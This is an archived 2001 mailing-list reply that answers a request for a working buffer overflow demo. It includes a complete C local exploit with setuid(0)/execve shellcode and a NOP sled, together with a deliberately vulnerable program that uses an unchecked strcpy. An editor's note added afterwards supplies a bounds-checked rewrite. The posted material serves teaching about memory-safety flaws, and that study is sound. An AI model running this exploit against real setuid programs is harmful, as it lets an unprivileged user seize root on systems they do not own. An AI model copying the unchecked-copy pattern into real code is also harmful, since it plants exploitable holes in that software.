Re: Buffer Overflow Example

From: Tobias Klein (tobias.kleinat_private)
Date: Thu Apr 19 2001 - 02:26:04 PDT


    At 09:46 AM 4/18/01 -0700, you wrote:
    >I have been searching for a very simple buffer overflow example, and I couldn't
    >get a working example.
    >
    >  I would like 2 things.
    >
    >1: A simple C program that I can install as root (I'll give the setuid as
    >ROOT) that causes a seg fault if overflowed.
    >2: An exploit program that I will install as a user that will overflow the
    >other program and spawn a shell
    >with the privileges of the other program.
    >
    >If someone could send me or tell me where to get a WORKING example of this
    >with source included, that would be great. I
    >
    >Thanks,
    >
    >Darius
    
    Here is a little lame example from me.
    The offset on my box is 500 (Debian); you can try it in steps of 50: 50, 100,
    150, ...
    
    I am sorry for my bad English.
    
    Happy learning!!!
    newroot
    
    <snip>
    /*
             Lame buffer overflow example written by newroot
             newrootat_private
             worked on Debian-Linux with offset 200-500
             happy learning :-)
    */
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>   /* memset, memcpy, strlen */
    #include <unistd.h>
    
    #define DEFAULT_OFFSET                    1
    #define BUFFER                          2048
    #define OVERSIZE                           8
    #define RET                       0xbffff50b
    #define NOP                            0x90
    
    char shellcode[] =
       "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" /* setuid (0x0); code written by newroot */
       "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
       "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
       "\x80\xe8\xdc\xff\xff\xff/bin/sh";
    
    /* Current stack pointer. The original relied on the value being left in
       %eax with no return statement, which is undefined behaviour; the value
       is now returned explicitly. */
    unsigned long get_sp (void)
    {
             unsigned long sp;
             __asm__("movl %%esp, %0" : "=r" (sp));
             return sp;
    }
    
    int main (int argc, char **argv)
    {
             char buffer [BUFFER+OVERSIZE+1];
             unsigned long sp;
             unsigned long addy;
             int offset = 0;
             int i;
    
             /* optional argument: offset subtracted from the current stack pointer */
             if (argc > 1) {
                      sp = get_sp ();
                      offset = atoi (argv[1]);
                      addy = sp - offset;
             }
             else addy = RET;
    
             printf ("Trying address: %lx\n", addy);
             /* the last OVERSIZE bytes carry the guessed address, one copy per word */
             for (i=BUFFER; i< BUFFER+OVERSIZE; i+=4)
                      *(unsigned long*)&buffer[i] = addy;
    
             /* NOP padding first, shellcode placed at the end of the BUFFER bytes */
             memset (buffer, NOP, BUFFER-strlen(shellcode));
             memcpy (buffer + BUFFER - strlen (shellcode), shellcode, strlen(shellcode));
    
             buffer[BUFFER+OVERSIZE] = '\0';
             printf ("Buffer %s\n", buffer);
    
             /* "./vun" is the compiled vulnerable program from the second snippet */
             execl ("./vun", "buffer", buffer, NULL);
    
             return 0;
    }
    
    
    </snip>
    
    <snip>
    
    #include <stdio.h>
    #include <string.h>
    
    void lame (char *buff)
    {
             char big [1024];      // <- I know this is a bad example
             char small [1024];    // too
    
             strcpy (small, buff); // no length check: input longer than 1024 bytes overruns small[]
             printf ("Small: %s\n", small);
    }
    
    int main(int argc, char **argv)
    {
             if  (argc > 1) {
                      lame (argv[1]);
             }
    
             return 0;
    }
    
    
    </snip>
    
    

    EWE TEL GmbH Tobias Klein Tel.: +49(0)441/8000-1572 Projekte & Mehrwertdienste Fax: +49(0)441/8000-1599 Cloppenburger Straße 310 tobias.kleinat_private D-26133 Oldenburg
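Added example, written by the editor and not part of newroot's post: a bounds-checked counterpart of the posted `lame()` function, with the length check that `strcpy` lacks and a constructed input of the same 2056-byte length (BUFFER+OVERSIZE) that the posted exploit passes on the command line. The names `fits_in_buffer`, `copy_bounded`, `not_lame` and `demo` are this example's own and appear nowhere in the original post.

```c
/* Added example, not part of newroot's post: a bounds-checked counterpart of
 * the posted lame() function. The function names and the constructed inputs
 * are this example's own assumptions. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define SMALL_SIZE 1024   /* same fixed stack buffer size as the posted small[] */

/* Length of src, never reading more than cap bytes, so an unterminated
 * input cannot make the check itself run off the end of the string. */
static size_t bounded_len(const char *src, size_t cap)
{
    size_t n = 0;
    while (n < cap && src[n] != '\0')
        n++;
    return n;
}

/* 1 if src plus its terminator fits in a cap-byte buffer, else 0. */
int fits_in_buffer(const char *src, size_t cap)
{
    if (src == NULL || cap == 0)
        return 0;
    return bounded_len(src, cap) < cap;
}

/* Copies src into dst only if it fits; returns the number of bytes copied, or
 * -1 (leaving dst empty) if the input was rejected. Rejecting is preferable to
 * silent truncation, which would hand the caller a valid-looking but altered string. */
int copy_bounded(char *dst, size_t cap, const char *src)
{
    size_t n;
    if (dst == NULL || cap == 0)
        return -1;
    if (!fits_in_buffer(src, cap)) {
        dst[0] = '\0';
        return -1;
    }
    n = strlen(src);
    memcpy(dst, src, n + 1);   /* n < cap, so the terminator fits as well */
    return (int)n;
}

/* Hardened version of the posted lame(): same fixed buffer on the stack, but
 * the copy can no longer run past it into the saved frame.
 * Returns 0 when the input was copied and -1 when it was rejected. */
int not_lame(const char *buff)
{
    char small[SMALL_SIZE];
    if (copy_bounded(small, sizeof small, buff) < 0) {
        fprintf(stderr, "input rejected: longer than %zu bytes\n", sizeof small - 1);
        return -1;
    }
    printf("Small: %s\n", small);
    return 0;
}

/* Stand-alone run with constructed inputs: a short string that fits and a
 * 2056-byte string of 'A's, the BUFFER+OVERSIZE length the posted exploit sends.
 * Returns 0 when both behave as expected. */
int demo(void)
{
    char oversized[2048 + 8 + 1];
    memset(oversized, 'A', sizeof oversized - 1);
    oversized[sizeof oversized - 1] = '\0';
    if (not_lame("hello") != 0)
        return 1;
    if (not_lame(oversized) != -1)
        return 2;
    return 0;
}

int main(int argc, char **argv)
{
    if (argc > 1)
        return not_lame(argv[1]) == 0 ? 0 : 1;
    return demo();
}
```

Build with `gcc -Wall -o not_lame not_lame.c` and run it with no arguments for the built-in demo, or with one argument to feed it your own input. The difference from the posted program is where the decision is made: a compiler stack protector would only notice the overwrite of `small[]` when `lame()` returns, after the frame is already corrupted, whereas `copy_bounded` refuses the input before a single byte is written.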



    This archive was generated by hypermail 2b30 : Fri Apr 20 2001 - 04:21:11 PDT